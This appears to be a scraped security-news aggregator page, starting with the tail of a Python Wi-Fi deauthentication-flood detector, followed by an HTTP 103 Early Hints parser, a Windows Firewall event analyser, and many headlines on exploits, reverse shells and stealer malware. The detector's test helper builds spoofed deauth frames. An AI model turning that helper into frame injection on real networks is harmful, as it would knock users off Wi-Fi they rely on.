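    if ftype != TYPE_MGMT or subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        return None
    return {
        "subtype": subtype,
        "dst": mac_str(frame[4:10]),      # addr1: receiver
        "src": mac_str(frame[10:16]),     # addr2: transmitter (easily spoofed)
        "bssid": mac_str(frame[16:22]),   # addr3
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
        "reason": struct.unpack_from("<H", frame, 24)[0],
    }


class DeauthFloodDetector:
    """Sliding-window rate check per transmitter address; one alert per address."""

    def __init__(self, threshold: int = 5, window: float = 10.0):
        self.threshold, self.window = threshold, window
        self.recent = defaultdict(deque)   # src mac -> timestamps inside the window
        self.alerted = set()

    def feed(self, ts: float, packet: bytes, radiotap: bool = True):
        frame = strip_radiotap(packet) if radiotap else packet
        info = parse_deauth(frame)
        if info is None:
            return None
        q = self.recent[info["src"]]
        q.append(ts)
        while ts - q[0] > self.window:
            q.popleft()
        if len(q) >= self.threshold and info["src"] not in self.alerted:
            self.alerted.add(info["src"])
            return {"time": ts, "source": info["src"], "bssid": info["bssid"],
                    "count": len(q), "reason": info["reason"]}
        return None


# --- constructed sample traffic (not a real capture) -------------------------
def build_deauth(src, dst, bssid, reason, seq):
    fc = bytes([(SUBTYPE_DEAUTH << 4) | (TYPE_MGMT << 2), 0x00])
    header = (fc + b"\x3a\x01" + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
              + struct.pack("<H", seq << 4))
    return header + struct.pack("<H", reason)


def with_radiotap(frame: bytes) -> bytes:
    return struct.pack("<BBHI", 0, 0, 8, 0) + frame   # minimal 8-byte radiotap header


def sample_capture():
    """One legitimate deauth from the AP, then a burst of spoofed deauths that
    claim the AP's address (what deauth tools do) sent to the broadcast address."""
    ap, client, bcast = "aa:bb:cc:dd:ee:01", "de:ad:be:ef:00:01", "ff:ff:ff:ff:ff:ff"
    pkts = [(100.0, with_radiotap(build_deauth(ap, client, ap, reason=3, seq=1)))]
    pkts += [(200.0 + i * 0.25, with_radiotap(build_deauth(ap, bcast, ap, reason=7, seq=i)))
             for i in range(8)]
    return pkts


def run_detector(pkts, threshold=5, window=10.0):
    det = DeauthFloodDetector(threshold, window)
    return [a for ts, p in pkts if (a := det.feed(ts, p)) is not None]


if __name__ == "__main__":
    for alert in run_detector(sample_capture()):
        print(f"{alert['time']:.2f} deauth flood from {alert['source']} "
              f"(bssid {alert['bssid']}, {alert['count']} frames, reason {alert['reason']})")
```

    Because a deauth attacker spoofs the AP's address, the "originating MAC" in the alert is the claimed transmitter, not the attacker's radio; the useful signal is the rate (and sequence-number discontinuities against the AP's real frames), and locating the attacker needs signal strength from the radiotap header or a second sensor.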

    Chrome 103 Beta: Early Navigation Hints, a Host of Completed Origin Trials, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 103 is beta as of May 26, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Early Hints for Navigation Chrome now supports the 103 Early Hints HTTP response code for navigation. (Note: the correspondence with the Chrome release number is a coincidence.) When a 103 response includes Link headers, Chromium tries to preload (and/or preconnect, prefetch) the specified resources before the final response is received. This gives web developers a way to optimize core web…
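    The wire-level behaviour described above, as an added example that is not Chromium code: a client must be prepared for zero or more interim 1xx responses, each with its own header block, before the final response arrives, and the Link headers of a 103 are the hints to act on. The byte stream, paths and host names below are constructed for the example.

```python
"""Reading an HTTP/1.1 response that begins with a 103 Early Hints interim response.

Added example, not Chromium code. SAMPLE is a constructed byte stream.
"""
import re

# <url>; param=value; param=value   (params stop at the next comma-separated link)
LINK_RE = re.compile(r"<([^>]*)>\s*((?:;[^,;]*)*)")


def parse_link_header(value: str):
    """Parse 'Link: <url>; rel=preload; as=style, <url2>; rel=preconnect' into
    a list of dicts holding the url and its lower-cased parameters."""
    links = []
    for m in LINK_RE.finditer(value):
        params = {}
        for p in m.group(2).split(";"):
            if "=" in p:
                k, v = p.split("=", 1)
                params[k.strip().lower()] = v.strip().strip('"')
        links.append({"url": m.group(1), **params})
    return links


def _read_head(buf: bytes, pos: int):
    """Parse one status line + header block starting at pos.
    Returns (status, [(name, value), ...], position after the blank line)."""
    end = buf.index(b"\r\n\r\n", pos)
    lines = buf[pos:end].decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, end + 4


def read_response(buf: bytes):
    """Consume interim 1xx responses, collecting preload hints from any 103,
    then return (hints, final_status, final_headers, body)."""
    hints, pos = [], 0
    while True:
        status, headers, pos = _read_head(buf, pos)
        if status == 103:
            for name, value in headers:
                if name == "link":
                    hints.extend(parse_link_header(value))
            continue
        if 100 <= status < 200 and status != 101:
            continue   # other informational responses carry no hints; 101 switches protocol
        break
    length = next((int(v) for n, v in headers if n == "content-length"), 0)
    body = buf[pos:pos + length]
    return hints, status, headers, body


SAMPLE = (
    b"HTTP/1.1 103 Early Hints\r\n"
    b"Link: </static/app.css>; rel=preload; as=style\r\n"
    b"Link: <https://cdn.example.test>; rel=preconnect, </static/app.js>; rel=preload; as=script\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"hello"
)

if __name__ == "__main__":
    hints, status, headers, body = read_response(SAMPLE)
    for h in hints:
        print("hint:", h)
    print("final:", status, body)
```

    A hint is a suggestion to fetch, not an instruction to execute: nothing in a 103 should be acted on beyond preloading or preconnecting, and the final response's headers still govern what the page may run. On the server side, remember the hints go out before the final response is computed, so do not emit resource names that an unauthenticated requester should not learn.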

    Bug Bounty FIRE Goals
    Using bug bounty along side full-time employment is a solid means to attain FIRE. (Financial Independence/Retire Early) Continue reading on Medium »
    AlbusSec:- Penetration-List 07 Cross-Site-Request-Forgery(CSRF) — Sample
    Hi Information Security folk, I hope you are well and doing great in your life, Also I hope You liked my previous article about… Continue reading on Medium »
    Social Media Take Over = Easy Money
    If you are alive like me, you probably also enjoy the idea of easy money. Continue reading on Techiepedia »
    How an Open Redirection Leads to an Account Takeover?
    Hey folks, I'm here to share one of my old findings, in which I found a unique way of an open redirection which leads to an account… Continue reading on InfoSec Write-ups »
    How I hacked Harvard and Cambridge | The anti-wayback method
    This blog is a continuation of my previous one. If you haven't read that, please do so to understand the entire context: Continue reading on Medium »

    Career Advice
    Hello everyone, I've just finished uni with a BSc Cybersecurity (United Kingdom). We've covered every domain you can think of. As you know it's the most important time for us to think about what career or domain in cybersecurity we want to specialise in. I've secured a role within OTT investigation (over the top content)/illegal streaming of content; I know it's early but I like to plan ahead for my future. However, I've worked as a tech support engineer for medical companies and I didn't enjoy it one bit (I've been through hell desk). The issue is that these two domains are vastly different but may abstractly supplement cybersecurity or DF roles that I may get in the future; I'm quite conflicted in terms of career pivoting and interests. I've also done a lot of DF, mainly on Windows, Chrome and Mozilla using Autopsy and the EnCase processor etc. I really enjoy investigating things. I was hoping people within DF could share some insight into what some of your duties are. I'm aware of CSAM in some of the DF roles, especially within LE. submitted by /u/Suspicious-Choice-92 [link] [comments]

    Operational Methodologies of Cyber Terrorist Organization “Transparent Tribe”
    No content preview
    Penetration Testing Benefits
    No content preview
    How an Open Redirection Leads to an Account Takeover?
    No content preview
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Module-3 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    1. Setting up Vulnerable Application For AWS WAF Continue reading on InfoSec Write-ups »

    Codenotary Adds Background Vulnerability Scanning
    Article URL: https://thenewstack.io/codenotary-adds-background-vulnerability-scanning/ Comments URL: https://news.ycombinator.com/item?id=31522042 Points: 1 # Comments: 0
    Tell HN: Mitigate Security Vulnerability in Tails 5.0
    Mitigate Security Vulnerability in Tails 5.0 : https://tails.boum.org/security/prototype_pollution/index.en.html >We recommend that you stop using Tails until the release of 5.1 (May 31) if you use Tor Browser for sensitive information (passwords, private messages, personal information, etc.). >Security level You can change the security level of Tor Browser to disable browser features as a trade-off between security and usability. For example, you can set the security level to Safest to disable JavaScript completely. The security level is set to Standard by default which gives the most usable experience. In about:config, set javascript.enabled to false and javascript.options.asmjs to false. Comments URL: https://news.ycombinator.com/item?id=31514412 Points: 2 # Comments: 0

    War in Ukraine / May 25
    95% of the Luhansk region are occupied Continue reading on Medium »
    How to install anon OS Tails on USB-drive?
    Today we will learn how to install a private OS TAILS — one of the Linux distributions based on Debian with maximum security. Continue reading on Medium »

    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    submitted by /u/mgalloar [link] [comments]
    Fully automated threat hunting. Too good to be true?
    https://medium.com/cybersecurityspace/fully-automated-threat-hunting-too-good-to-be-true-88e39fe0f13e Can we get to a point when fully automated threat hunting is possible in the indefinite future? submitted by /u/Cultural_Budget6627 [link] [comments]
    GitHub - sailay1996/CdpSvcLPE: Windows Local Privilege Escalation via CdpSvc service (Writeable SYSTEM path Dll Hijacking)
    submitted by /u/soupcreamychicken [link] [comments]

    SecWiki News 2022-05-26 Review
    No new articles today. For more, visit SecWiki.

    FreeBuf client-side group discussion | Would you give domestically developed security products a chance? What do you think of the Sohu phishing email incident?
    At present, domestically developed technologies, products and services still face enormous challenges. How far has localization progressed, and which hard problems remain to be solved?
    KurayStealer malware builder surfaces
    Uptycs researchers recently discovered KurayStealer, a new malware builder sold to criminals to make it easier for them to build malware.
    MetaStealer takes over from Raccoon Stealer for credential theft
    MetaStealer is a newly emerged information-stealing malware designed to fill the gap left when Raccoon Stealer ceased operations in March 2022.
    FreeBuf Morning Report | Twitter hit with US$150 million fine; India's second-largest airline hit by ransomware
    The US Federal Trade Commission (FTC) will fine Twitter US$150 million.
    "Shenjian Attack-Defense Drill Handbook": investigating 0-day attacks
    How to quickly track anomalies and fully investigate the attack chain during an attack-defense exercise? Leave it to the Shenjian tool "Xiangshou"!
    Arrested! Suspected leader of the SilverTerrier gang detained by Nigerian police
    Nigerian police recently arrested the suspected leader of the SilverTerrier cybercrime gang in Lagos.
    ChromeLoader malware surges, threatening browsers worldwide
    After holding steady since the start of the year, ChromeLoader malware volume rose this month.
    Twitter fined US$150 million over deceptive targeted advertising
    The US Federal Trade Commission (FTC) will fine Twitter US$150 million over deceptive advertising.
    New Cheers ransomware targets VMware ESXi servers
    VMware ESXi is a virtualization platform widely used by large organizations worldwide, so encrypting it for ransom usually severely disrupts business operations.

    How to Detect TOR Network Connections with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive and POC
    submitted by /u/scopedsecurity [link] [comments]
    Improving the ICS-OT Vulnerability Disclosure Process Between Researchers and Vendors
    submitted by /u/derp6996 [link] [comments]
    VirtualBox leaks host ring 0 SIMD registers into guest ring 3
    submitted by /u/zx2c4 [link] [comments]

    Intro to Web App Security Testing: Burp Suite Tips & Tricks
    A brief list of useful things we wish we had known sooner Burp Suite Pro can be complicated and intimidating. Even after learning and becoming comfortable with the core functionality, there remains a great deal of depth throughout Burp Suite, and many users may not stray far from the staples they know. However, after years... The post Intro to Web App Security Testing: Burp Suite Tips & Tricks appeared first on TrustedSec.

    Letsdefend.io EventID 116
    The alert with EventID 116 shows that Javascript code is detected in URL. Continue reading on Medium »

    What was Bryan Neumeister talking about in the Johnny Depp defamation case?
    Can someone go into detail about what exactly Bryan Neumeister was talking about in the Johnny Depp defamation case? submitted by /u/YungTerpenzee [link] [comments]
    Book suggestions for digital forensics enthusiast
    Hello guys, I am interested in digital forensics and wish to read some good books on it. It could be an introduction to this domain which is easy to understand, written by a field expert and maybe fun to read, but it should illustrate the domain well. Please do suggest books or post links to purchase. TIA :) submitted by /u/the_bearded_madrasi [link] [comments]
    virtual chain of custody
    Anyone have a process for virtual chain of custody? Like if a client sends you a VM or AWS snapshot, do you record chain of custody? Curious what other groups do. submitted by /u/CrazyKitty2016 [link] [comments]
    Examiners in the field, what happens with a case and its evidence if the device is infected with malware?
    Hello all, I am a junior malware analyst/IR and am currently writing my undergraduate thesis for a B.S. in Computer Forensics. For my thesis, I am gearing towards a malware angle applied to digital forensics since those are both my passions. I have conducted extensive research, but one thing I cannot get a solid grasp on is what happens to an investigation when the examiner(s) confirm that the device is infected with malware. Does the investigation continue regardless and all pertinent evidence per the limits of the warrant is documented as normal? Or does the investigation pause and the device is handed off to a third-party to conduct professional malware analysis on the device to determine if evidence has been either generated by the malware itself or tampered with? submitted by /u/ringzero_ [link] [comments]
    Advice considering a career in computer forensics
    I currently have a bachelor's degree in computer & information technology and am currently working towards getting a master's degree in computer technology and data science. I always imagined that my degrees would lead me to a career in programming. However, I have recently learned about computer forensics and it sounds like a fun and interesting career. What sort of requirements and training are needed for a career in this field? I probably would want a job assisting police and law enforcement in investigations. What sort of salary would a job like this have, and what benefits and drawbacks would a job like this have? I have a limited knowledge of what the job market is like for this profession so any information would be nice! submitted by /u/No_Curve_3351 [link] [comments]

    Pre-hijacked accounts (pdf, research paper)
    submitted by /u/ScottContini [link] [comments]
    Zoom RCE via "xmpp stanza smuggling"
    submitted by /u/phree_radical [link] [comments]
    RCE over ham radio - Reverse shell via WinAPRS
    submitted by /u/rickostuff [link] [comments]
    Security Code Audit - For Fun and Fails
    submitted by /u/scopedsecurity [link] [comments]
    Tetragon: case study of security product's self-protection
    submitted by /u/hardenedvault [link] [comments]
    seL4 Whitepaper released.
    submitted by /u/providerstatistics [link] [comments]
    The printer goes brrrrr!!!
    submitted by /u/0xdea [link] [comments]
    Finding Bugs in Windows Drivers, Part 1 – WDM
    submitted by /u/jat0369 [link] [comments]

    Vulnerability In PayPal worth 200000$ bounty
    Article URL: https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc Comments URL: https://news.ycombinator.com/item?id=31510256 Points: 1 # Comments: 1
    Security Vulnerability in Tor Browser
    Article URL: https://darknetlive.com/post/psa-security-vuln-in-tor-browser/ Comments URL: https://news.ycombinator.com/item?id=31509777 Points: 187 # Comments: 94
    Serious security vulnerability in Tails 5.0
    Article URL: https://tails.boum.org/security/prototype_pollution/index.en.html Comments URL: https://news.ycombinator.com/item?id=31501499 Points: 4 # Comments: 0

    How I made it into the United Nations hall of fame as I slept
    This article is going to be about how I got my name in the United Nations hall of fame for finding a reflected XSS bug as I slept. Continue reading on Medium »
    2fa bypass again
    Hello My Dear Buggies!!! Continue reading on Medium »
    Atlassian Jira Seraph Authentication Bypass RCE
    CVE-2022–0540 Continue reading on Medium »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    My Blackhat stories- How I hacked a college and paid my friend's fees
    Intro: Continue reading on Medium »
    How I was able to hack A Panel PHP Material_Wallpaper(solodroid)&Viaviweb
    Hello everyone, I'm "the injector", I'm a network administrator and a bug bounty hunter. Today I will show you how I hacked a panel of PHP… Continue reading on Medium »

    Lot of old cartoons, some spanish
    http://fina.dyndns.tv/Cartoons/ Go up a directory for other media submitted by /u/inoculatemedia [link] [comments]
    torrent RSS feeds of premium leftie podcasts
    submitted by /u/kBr9gFITLKkTVSEiQ6PJ [link] [comments]

    Taking ESF For A(nother) Spin
    2+ years ago from the date of this blog post I wrote my initial blog post where I started becoming familiar with Apple’s Endpoint Security… Continue reading on Medium »
    Attack and Hunting Lateral Movement with Service Control Manager(SVCCTL)
    There are some lateral movement techniques that don't rely on vulnerabilities, like WMI, PsExec and Dcom. These methods require that… Continue reading on Medium »

    War in Ukraine / May 24
    👉 The greatest air battle of the 21st Century [Expert View] Continue reading on Medium »
    Approaching CTF OSINT Challenges — Learn by Example
    New to OSINT challenges? Based on examples from the recent 2022 NahamCon CTF, I provide general recommendations on solving OSINT challenges. Continue reading on InfoSec Write-ups »

    "vPub v5" opensource online Party! - this Thursday at 4 PM UTC
    submitted by /u/Mike-Banon1 [link] [comments]

    Blind XSS in app.pullrequest.com/ via /reviews/ratings/{uuid}
    HackerOne disclosed a bug submitted by bugra: https://hackerone.com/reports/1558010 - Bounty: $2500
    Stored XSS in Notes (with CSP bypass for gitlab.com)
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1481207 - Bounty: $13950
    Email templates XSS by filterXSS bypass
    Judge.me disclosed a bug submitted by caue: https://hackerone.com/reports/1404804 - Bounty: $1250

    SecWiki News 2022-05-25 Review
    HTB-467-Noter by o1hy; Gmail's restrictions on attachments by ourren; IEEE S&P 2022 remote coverage (3) by ourren; IEEE S&P 2022 remote coverage (2) by ourren; IEEE S&P 2022 remote coverage (1) by ourren; Cloud-native security: Tetragon as a case study in security product self-protection by ourren; SHADEWATCHER: cyber threat analysis based on system audit records and recommendation concepts by ourren. For more, visit SecWiki.

    Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor
    INTERPOL and The Nigeria Police Force arrested a prominent business email compromise actor as part of Operation Delilah. The post Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor appeared first on Unit42.

    How to conduct a security audit of Power BI?
    I want to conduct a security audit of Power BI. What I mean by security audit: 1) List of all workspaces; 2) List of all reports/dashboards/etc. and permissions (who has access and with whom they are shared). Do you know what role I need in O365 to have permission to see such information? Right now I can see only "My workspace", but I need a list of all workspaces in my organization. Does someone have experience with security assessment/audit of Power BI? submitted by /u/athanielx [link] [comments]
    Security Testing/Assessment - Sharepoint Plugin
    How can one assess the security of available plugins for SharePoint? AMREIN has a large number of plugins available. The business has requested security checks before purchase. Can someone share a security checklist for plugins, or tools available on the web to test them? What are the common concerns around plugins? submitted by /u/Anahata___ [link] [comments]

    FreeBuf Morning Report | Australia, India, Japan and the US pledge deeper data security cooperation; first attack technique against 6G networks disclosed
    Leaders of the Australia-India-Japan-US alliance met on the 24th and pledged to deepen cooperation on information security and data sharing.
    All about port scanning
    Do not use the techniques in this article for illegal testing; the author bears no responsibility for any consequences.
    [Very detailed] Vulnhub walkthrough: DC-3
    A very detailed Vulnhub DC-3 walkthrough, shared for learning.
    China Telecom Cloud Security Lab | Tracing a phishing email: a technical share
    Phishing email attacks have been frequent recently. China Telecom Cloud Security Lab selected one phishing email to analyze and trace back to its source, to raise awareness and improve defenses against phishing.
    Web security basics: cross-site scripting (XSS)
    Cross-site scripting (XSS) is the number one enemy of client-side security; the OWASP Top 10 has listed XSS near the top for years.
    Sohu reportedly hit by an "epic" email scam; Charles Zhang responds
    Charles Zhang said the internal mailbox password of one Sohu employee was stolen, the scammers impersonated the finance department to send phishing emails to employees, and total losses were under 50,000 yuan.
    Ransomware attacks are increasing at an alarming rate
    According to the latest report, ransomware breaches increased by 13%.
    Watch your wallet! Microsoft warns of stealthier payment credential skimming attacks
    Microsoft security researchers recently observed web skimming attacks that use multiple obfuscation techniques to evade detection. Most of these attacks target e-commerce and similar platforms to steal users' payment credentials.
    Dingmao Technology: data + AI to enhance security operations | Cybersecurity New Forces SOLO launch season
    How should AIOps get closer to business needs while solving data governance problems? Find out at the Cybersecurity New Forces SOLO launch season.

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Approaching CTF OSINT Challenges — Learn by Example
    No content preview
    TryHackMe writeup: HackPark
    No content preview
    Nunchucks from HackTheBox — Detailed Walkthrough
    No content preview
    Antivirus Evasion — Part 1
    No content preview
    Hacking Web3: Introduction and How to Start
    No content preview
    Kerberos Authentication in Active Directory
    No content preview

    Critical broken cookie signing on dagobah.flickr.com
    Flickr disclosed a bug submitted by ian: https://hackerone.com/reports/1440290 - Bounty: $479
    [com.exness.android.pa Android] Universal XSS in webview. Lead to steal user cookies
    EXNESS disclosed a bug submitted by nearsecurity: https://hackerone.com/reports/532836 - Bounty: $400
    Cross-site scripting on dashboard2.omise.co
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1532858 - Bounty: $200

    Windows Firewall Event Logs
    I have a ransomware attack and am looking at several event logs from a local machine on the network that show rules being added, changed, and deleted, referencing the Windows Firewall. These events are consistent on almost a daily basis and occur almost exclusively during the early morning hours when the business was closed for several weeks leading up to the implementation of the ransomware. Other than the attackers, are there any normal circumstances that may have caused this on such a consistent basis, such as normal updates? With that being said, I am limited in verifying a lot of evidence as the business had already wiped their servers and most local machines by the time I got involved… so I'm pretty much limited to this single computer to figure out what I can. submitted by /u/outdorksman [link] [comments]
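    One way to put numbers on the pattern the post above describes, as an added example (not from the post): Windows writes rule changes to the Microsoft-Windows-Windows Firewall With Advanced Security/Firewall log as EventID 2004 (rule added), 2005 (rule modified) and 2006 (rule deleted). The code buckets those events per day, counts how many fell outside business hours or on a weekend, and lists rule names that recur across several days. The event records, rule names and paths below are constructed; in practice export the log with wevtutil qe /f:xml and map each event to this shape. Business hours and the flagging thresholds are assumptions to adjust.

```python
"""Off-hours clustering of Windows Firewall rule-change events (added example)."""
from collections import Counter, defaultdict
from datetime import datetime

RULE_EVENTS = {2004: "added", 2005: "modified", 2006: "deleted"}


def is_off_hours(ts: datetime, open_hour: int = 8, close_hour: int = 18) -> bool:
    """True outside business hours or on a weekend (weekday(): Mon=0 .. Sun=6)."""
    return ts.weekday() >= 5 or not (open_hour <= ts.hour < close_hour)


def summarize(events, open_hour=8, close_hour=18):
    """Per-day counts of rule changes and how many were off-hours, plus the rule
    names seen on three or more distinct days (the 'same thing every night' pattern)."""
    per_day = defaultdict(lambda: {"total": 0, "off_hours": 0, "actions": Counter()})
    days_seen = defaultdict(set)
    for ev in events:
        if ev["event_id"] not in RULE_EVENTS:
            continue                      # not a rule add/modify/delete
        ts = datetime.fromisoformat(ev["time"])
        day = ts.date().isoformat()
        rec = per_day[day]
        rec["total"] += 1
        rec["actions"][RULE_EVENTS[ev["event_id"]]] += 1
        if is_off_hours(ts, open_hour, close_hour):
            rec["off_hours"] += 1
        days_seen[ev["rule_name"]].add(day)
    recurring = sorted(name for name, days in days_seen.items() if len(days) >= 3)
    return dict(per_day), recurring


def flag_days(per_day, min_events=3, min_ratio=0.75):
    """Days with enough rule changes where (almost) all of them were off-hours."""
    return sorted(d for d, r in per_day.items()
                  if r["total"] >= min_events and r["off_hours"] / r["total"] >= min_ratio)


# --- constructed sample events (not real log data) ----------------------------
def _night(day):
    """Add, modify and delete the same rule around 02:00 on a given May 2022 night."""
    return [{"time": f"2022-05-0{day}T02:{minute:02d}:00", "event_id": eid,
             "rule_name": "Remote Service", "app": "C:\\Windows\\Temp\\svc.exe"}
            for minute, eid in zip((11, 12, 58), (2004, 2005, 2006))]


SAMPLE_EVENTS = _night(2) + _night(3) + _night(4) + [          # Mon, Tue, Wed nights
    {"time": "2022-05-03T14:30:00", "event_id": 2005,
     "rule_name": "File and Printer Sharing (SMB-In)", "app": "System"},
    {"time": "2022-05-05T09:05:00", "event_id": 2004,
     "rule_name": "Backup Agent", "app": "C:\\Program Files\\Backup\\agent.exe"},
    {"time": "2022-05-05T09:06:00", "event_id": 2005,
     "rule_name": "Backup Agent", "app": "C:\\Program Files\\Backup\\agent.exe"},
    {"time": "2022-05-05T10:00:00", "event_id": 2003, "rule_name": "", "app": ""},  # not a rule change
    {"time": "2022-05-07T12:00:00", "event_id": 2004,                                # Saturday
     "rule_name": "Remote Service", "app": "C:\\Windows\\Temp\\svc.exe"},
]

if __name__ == "__main__":
    per_day, recurring = summarize(SAMPLE_EVENTS)
    for day in sorted(per_day):
        r = per_day[day]
        print(day, r["total"], "changes,", r["off_hours"], "off-hours,", dict(r["actions"]))
    print("flagged days:", flag_days(per_day))
    print("rules recurring across days:", recurring)
```

    Legitimate software can add firewall rules at install or update time, but it rarely adds, modifies and deletes the same rule every night; pairing the 2004/2006 pairs with the application path in the event (here a Temp directory) and with 4624/4672 logons at the same minutes is what separates scheduled maintenance from hands-on-keyboard activity.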
    Practice Investigating Linux Systems using only Linux CLI + Cyber5W Mini CTF Hints
    submitted by /u/DFIRScience [link] [comments]
    Private Investigator / DFIR crossover?
    Some of my coworkers have their PI licenses, and becoming a DF/PI consultant is something that I've toyed with. I have intelligence and an LE background, so it's not a crazy idea. Does anyone have any experience going this route? TIA! submitted by /u/FAlady [link] [comments]
    Postgraduate Degree Dilemma
    I am 22 and I just graduated with a BSc Computer and Digital Forensics degree. I am considering a master's degree but haven't decided yet what to do. My first choice is to continue in the field of my bachelor's degree and pursue further education in Digital Forensics with a master's like MSc Cybersecurity, MSc Digital Forensics or MSc Advanced Computer Science. My second option is an LLM Cyber Law master's, as I was always interested in this area. My concern is whether the LLM Cyber Law degree will actually help me and reinforce my bachelor's degree, giving a good combination of degrees for the job market, rather than being an irrelevant master's degree. Another thing: is it a good idea to study an LLM in Cyber Law without having a basic law degree, and how will this affect me in the job market? I'm really trying to figure out what you think is best from your perspective. I want to hear any advice or recommendations you may have. submitted by /u/AshMustard15 [link] [comments]

    How to Buy X Doge Token ($X) — Beginner’s Guide
    Continue reading on Medium »
    VulnHub: CySec: 2
    Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to… Continue reading on Medium »

    Multiple vulnerabilities in radare2
    submitted by /u/soupcreamychicken [link] [comments]
    Malware Campaign Targets InfoSec Community: Threat Actor Uses Fake Proof of Concept to Deliver Cobalt-Strike Beacon
    submitted by /u/soupcreamychicken [link] [comments]

    fire: Fast tool to filter resolved domains (good for Bug Bounty purposes in a pipeline of scripts)
    submitted by /u/deleee [link] [comments]
    New Rhino Blog Post: CVE-2022-25237: Bonitasoft Authorization Bypass and RCE
    submitted by /u/hackers_and_builders [link] [comments]
    GitHub - Peco602/findwall: Check if your provider is blocking you!
    submitted by /u/Peco602 [link] [comments]
    Cisco Issues Patch for New IOS XR Zero-Day Vulnerability Exploited in the Wild
    submitted by /u/Late_Ice_9288 [link] [comments]

    River: a tool for quantitative media analysis
    A web app for tracking and comparing news agencies' reporting on the Russia-Ukraine war. Continue reading on Medium »
    War in Ukraine / May 23
    The war in the center of Europe has been going on for three months Continue reading on Medium »
    Check Which APT Group Targets your Organization
    Today we will see how to identify which APT Group is interested in your organization to attack. Continue reading on Medium »
  • Open

    GitBook Email HTML INJECTION
    Hello friends, let me introduce myself: my name is Mohammad Alfin Hidayatullah, and I am a Bug Bounty Hunter. This time I will share… Continue reading on Medium »
    Bware Labs Bets $100,000 on Blast quality by launching a Bug Bounty campaign
    We are thrilled to announce the launch of our bug bounty program on Blast, in partnership with Immunefi, Web3’s leading bug bounty… Continue reading on Bware Labs »
    How I found SSRF external interaction on Bugcrowd Public program in 5 min
    Tools - https://subdomainfinder.c99.nl/ - burp suite - burp Collaborator  - assetfinder : https://github.com/tomnomnom/assetfinder - httpx… Continue reading on Medium »
    How to effectively hunt for vulnerabilities in Wordpress Sites
    Hi Sleepyheads! Miss me? Continue reading on Medium »
    HTTP Response Splitting [CWE-113] — The Hacktivists
    HTTP Response Splitting weakness describes improper neutralization of CRLF sequences in HTTP headers. Continue reading on Medium »
    Improper Handling of Length Parameter Inconsistency [CWE-130] — The Hacktivists
    Improper Handling of Length Parameter Inconsistency is a security weakness that describes improper handling of a length field for… Continue reading on Medium »
    Off-by-one Error [CWE-193] — The Hacktivists
    Off-by-one error occurs when a program uses an improper maximum or minimum value that is one more or one less than the proper value. Continue reading on Medium »
    PHP File Inclusion [CWE-98] — The Hacktivists
    PHP File Inclusion weakness describes improper control of filename within Include() or Require() statements in a PHP program. Continue reading on Medium »
  • Open

    Event log persistence
    submitted by /u/Alareon [link] [comments]
  • Open

    SecWiki News 2022-05-24 Review
    Thoughts and Practice on an XDR-based Network Security System by ourren; SecWiki Weekly (Issue 429) by ourren; A Benchmark Study of Embedding-based Knowledge Graph Entity Alignment by ourren; Potential Abuse of Domain Name Historical Reputation by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Creating Reverse C2 Channel with C# Powershell and Python
    I know C2 servers are always handy, especially when they bypass most anti-virus solutions. Continue reading on Medium »
  • Open

    Pwnton Pack: An Unlicensed 802.11 Particle Accelerator
    This past Christmas, I received a terrific gift from my in-laws: a replica Ghostbusters Proton Pack. I was thrilled. You see, growing up in the mid 80s, Ghostbusters was my jam. Fast forward 37 years and with the recent Ghostbusters: Afterlife film release, my nostalgia was hitting a fever pitch. Shortly after our Christmas dinner,... The post Pwnton Pack: An Unlicensed 802.11 Particle Accelerator appeared first on TrustedSec.
  • Open

    FreeBuf Morning Report | Mark Zuckerberg sued over data breach; nation-state cyber weapons will soon appear on the dark web
    Interpol Secretary General Jurgen Stock warned that state-developed cyber weapons will appear on the dark web in “a few years”.
    Breaking Down the 2021 OWASP Top 10 One by One: A02 Cryptographic Failures
    Previously known as Sensitive Data Exposure, which was more a broad symptom than a root cause, the focus is on failures related to cryptography (or its absence). This often leads to exposure of sensitive data.
    Recruiting | The Du Xiaoman Financial security department is waiting for you
